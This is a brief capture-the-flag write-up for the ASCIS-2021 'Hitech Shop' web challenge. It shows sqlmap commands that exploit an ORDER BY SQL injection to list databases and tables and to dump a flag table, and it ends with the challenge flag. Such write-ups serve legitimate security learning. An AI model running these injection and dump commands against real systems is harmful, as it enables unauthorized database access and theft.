ASCIS-2021 Warm-up - 100pts

--- tags: CTF --- # ASCIS-2021 Warm-up - 100pts * Category: Web * Name: Hitech Shop * Level: None * Description: None ## Solution * Overview the challenge provided us a search box i think it `Sql Injection` ![](https://i.imgur.com/8NqfJHP.png) * I try `double quote` and this is server response ![](https://i.imgur.com/9Hl1hl7.png) * Run this command in sqlmap `sqlmap -u http://125.235.240.166:20105/index?order=price --time-sec=200 --user-agent=* --dbs --level 5 ` * I found two databases, but i only attention `vannd` ![](https://i.imgur.com/LQT6X0X.png) * Then i used command `sqlmap -u http://125.235.240.166:20105/index?order=price --tables -D vannd` for scan `vannd` table * Finally i found a table contain flag =)))) ![](https://i.imgur.com/ST9hnnl.png) * Later i scan `flag` table used this command `sqlmap -u http://125.235.240.166:20105/index?order=price --columns -D vannd -T flag --dump` ![](https://i.imgur.com/ihEPKAB.png) * FLAG `ASCIS{SQL_1nJecTi0n_Ba5e_0N_OrdeR_bY}`